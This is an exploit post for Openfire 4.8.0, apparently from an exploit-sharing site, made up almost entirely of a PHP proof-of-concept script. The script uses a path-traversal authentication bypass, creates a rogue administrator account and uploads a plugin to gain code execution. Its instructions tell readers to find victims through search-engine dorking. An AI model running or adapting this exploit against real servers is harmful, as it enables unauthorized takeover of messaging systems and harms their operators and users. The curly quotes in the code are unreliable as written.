Openfire 4.8.0 Code Injection
=============================================================================================================================================
| # Title : Openfire release 4.8.0 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.igniterealtime.org/projects/openfire/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine. [+] uses the CURL to Allow remote command . [+] Line 115 set your target . [+] save code as poc.php . [+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?php
class OpenfireExploit
{
private $targetUrl;
private $adminUsername;
private $adminPassword;
private $pluginName;
private $csrfToken;
public function __construct($targetUrl, $adminUsername = null, $adminPassword = null, $pluginName = null)
{
$this->targetUrl = rtrim($targetUrl, ‘/’) . ‘/’;
$this->adminUsername = $adminUsername ?? $this->generateRandomString(8, 15);
$this->adminPassword = $adminPassword ?? $this->generateRandomPassword(8, 10);
$this->pluginName = $pluginName ?? $this->generateRandomString(8, 15);
}
private function generateRandomString($minLength, $maxLength)
{
$length = rand($minLength, $maxLength);
return substr(str_shuffle(“abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”), 0, $length);
}
private function generateRandomPassword($minLength, $maxLength)
{
return bin2hex(random_bytes(rand($minLength, $maxLength) / 2));
}
private function sendRequest($method, $uri, $data = null, $headers = [])
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->targetUrl . $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
return curl_exec($ch);
}
private function getCsrfToken()
{
$response = $this->sendRequest(‘GET’, ‘login.jsp’);
preg_match(‘/csrf=([^;]+)/’, $response, $matches);
return $matches[1] ?? null;
}
private function authBypass()
{
$this->sendRequest(‘GET’, ‘setup/setup-s/../../../../user-groups.jsp’);
// Check if we can access the user-groups.jsp page
return $this->sendRequest(‘GET’, ‘setup/setup-s/../../../../user-groups.jsp’) !== false;
}
private function addAdminUser()
{
$this->csrfToken = $this->getCsrfToken();
$data = http_build_query([
‘csrf’ => $this->csrfToken,
‘username’ => $this->adminUsername,
‘password’ => $this->adminPassword,
‘passwordConfirm’ => $this->adminPassword,
‘isadmin’ => ‘on’,
‘create’ => ‘Create User’
]);
return $this->sendRequest(‘POST’, ‘setup/setup-s/../../../../user-create.jsp’, $data);
}
private function uploadPlugin($pluginFilePath)
{
$this->csrfToken = $this->getCsrfToken();
$cfile = new CURLFile($pluginFilePath);
$data = [
‘uploadfile’ => $cfile,
‘csrf’ => $this->csrfToken
];
$headers = [‘Content-Type: multipart/form-data’];
return $this->sendRequest(‘POST’, ‘plugin-admin.jsp’, $data, $headers);
}
public function exploit()
{
if ($this->authBypass()) {
echo “Authentication bypass successful.\n”;
if ($this->addAdminUser()) {
echo “Admin user ‘{$this->adminUsername}’ added successfully.\n”;
// Prepare plugin JAR file path
$pluginJarPath = ‘/path/to/plugin.jar’; // Replace with actual path to the JAR file
if ($this->uploadPlugin($pluginJarPath)) {
echo “Plugin uploaded successfully.\n”;
} else {
echo “Failed to upload plugin.\n”;
}
} else {
echo “Failed to add admin user.\n”;
}
} else {
echo “Authentication bypass failed.\n”;
}
}
}
// Usage
$exploit = new OpenfireExploit(‘http://target-openfire-url.com’);
$exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================